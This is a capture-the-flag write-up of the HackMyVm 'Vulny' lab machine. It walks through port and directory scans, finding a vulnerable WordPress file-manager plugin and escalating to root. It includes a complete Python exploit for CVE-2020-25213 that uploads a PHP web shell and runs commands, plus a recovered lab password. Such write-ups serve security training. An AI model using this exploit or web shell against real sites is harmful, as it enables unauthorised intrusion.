Here I will make a writeup of the Vulny machine on the HackMyVm platform and this is an easy rated VM, if you are interested you can click the link here. Let's start.
As always the first thing i do is port scanning. and at this point nmap only find one open TCP port that is HTTP (80):
$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
The website display provided is only the default display, so we need to look for a hidden path or file using bruteforce directory tools such as dirb, dirsearch, etc.
─$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Target: http://192.168.1.38/
[04:12:21] Starting:
[04:12:49] 200 - 11KB - /index.html
[04:12:51] 301 - 317B - /javascript -> http://192.168.1.38/javascript/
[04:13:10] 301 - 313B - /secret -> http://192.168.1.38/secret/
Task Completed
Here we find 2 directories, namely /javascript
and /secret
. If we access /javascript
the response given is Forbidden or not permitted. but in the /secret
directory you can access it and find a note.
From this information, it is known that there is an endpoint config from WordPress which contains a password/username. but this is quite strange because if we use wappalyzer or wpscan we find no indication that the web server uses wordpress.
Next, we try to bruteforce the directory again using dirsearch specifically for the secret path.
$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Target: http://192.168.1.38/secret/
[04:32:45] Starting:
[04:33:29] 200 - 7KB - /secret/readme.html
[04:33:42] 301 - 322B - /secret/wp-admin -> http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 - 324B - /secret/wp-content -> http://192.168.1.38/secret/wp-content/
[04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/akismet.php
[04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/admin.php
[04:33:42] 200 - 2KB - /secret/wp-content/
[04:33:42] 200 - 1003B - /secret/wp-content/upgrade/
[04:33:42] 200 - 1KB - /secret/wp-content/uploads/
[04:33:42] 301 - 325B - /secret/wp-includes -> http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 - 3KB - /secret/wp-admin/setup-config.php
[04:33:43] 500 - 0B - /secret/wp-includes/rss-functions.php
Task Completed
From these results, 3 paths were found, namely;
/wp-admin
= The response given is the same as /secret
/wp-content
= Response 200
/wp-includes
= Forbidden
Next, we can focus on /wp-content
and in it there is the /uploads
directory and if we access it we find that this website uses the wp-file-manager plugin.
If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ You will find the version of wp-file-manager, namely 6.0. and this version vulnerable !
We need to download the exploit and make small changes to the location of the url by adding /secret
.
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint
def handler(sig,frame):
print ("[!]Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT,handler)
def commandexec(command):
exec_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
params = {
"cmd":command
}
r=requests.get(exec_url,params=params)
soup = BeautifulSoup(r.text, 'html.parser')
text = soup.get_text()
print (text)
def exploit():
global url
url = sys.argv[1]
command = sys.argv[2]
upload_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
'Connection': "close"
}
payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
try:
r=requests.post(upload_url,data=payload,headers=headers)
#pprint(r.json())
commandexec(command)
except:
print("[!] Algo ha salido mal...")
def help():
print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")
if __name__ == '__main__':
if len(sys.argv) != 3:
help()
else:
exploit()
Then run the script.
Here we managed to get the shell, next we need to get the reverse shell.
After getting the reverse shell, we need to check the config file to find the user/password like the hint given in /secret
earlier.
idrinksomewater
A password was found, and we checked in /etc/passwd there was a user adrian
. and we can assume that this password belongs to Ari Adrian
.
Login as adrian
and the password you obtained earlier. and here we have successfully entered.
We need to do is check whether the user can exercise sudo access rights or not and to display a list of permitted commands with the command sudo -l
There is a binary flock and we can use it to carry out privilege escalation.
And root was successfully obtained. Vulny pwned!